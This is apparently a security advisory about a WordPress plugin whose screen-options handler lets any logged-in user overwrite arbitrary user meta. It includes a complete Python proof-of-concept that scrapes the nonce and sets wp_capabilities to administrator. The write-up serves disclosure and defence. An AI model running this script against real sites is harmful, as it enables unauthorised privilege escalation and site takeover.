The plugin is affected by an Arbitrary Usermeta Update vulnerability, which leads to Privilege Escalation.

 

Let’s check the plugin

The rx_set_screen_options() function updates the user meta with the following code:

$option = $_POST['wp_screen_options']['option'];
$value = $_POST['wp_screen_options']['value'];

update_user_meta( $user->ID, $option, $value );

There are no restrictions on what user meta values can be updated, and there is no restriction on the value either.

The function includes a nonce check, but it uses a general nonce that is available on every admin page where there is a screen option.

 

Let’s see how we can exploit this vulnerability

I created a Python script that queries the nonce and updates wp_capabilities to administrator:

import requests
from bs4 import BeautifulSoup

website_url = 'http://localhost/'
username = 'user'
password = 'pw'

# format url
website_url = website_url.rstrip('\/')

with requests.Session() as session:
    # login request
    session.post(website_url + '/wp-login.php', data={
        'log': username,
        'pwd': password
    })

    # get nonce value from input hidden html
    response = session.get(website_url + '/wp-admin/')
    print(response.text)
    soup = BeautifulSoup(response.text, 'html.parser')

    screenoptionnonce_element = soup.find('input', {'id': 'screenoptionnonce'})
    screenoptionnonce = screenoptionnonce_element['value']

    # update user capabilities request
    session.post(website_url + '/wp-admin/',
                 headers={'Content-Type': 'application/x-www-form-urlencoded'},
                 data={
                     'wp_screen_options[option]': 'wp_capabilities',
                     'wp_screen_options[value][administrator]': '1',
                     'screenoptionnonce': screenoptionnonce
                 })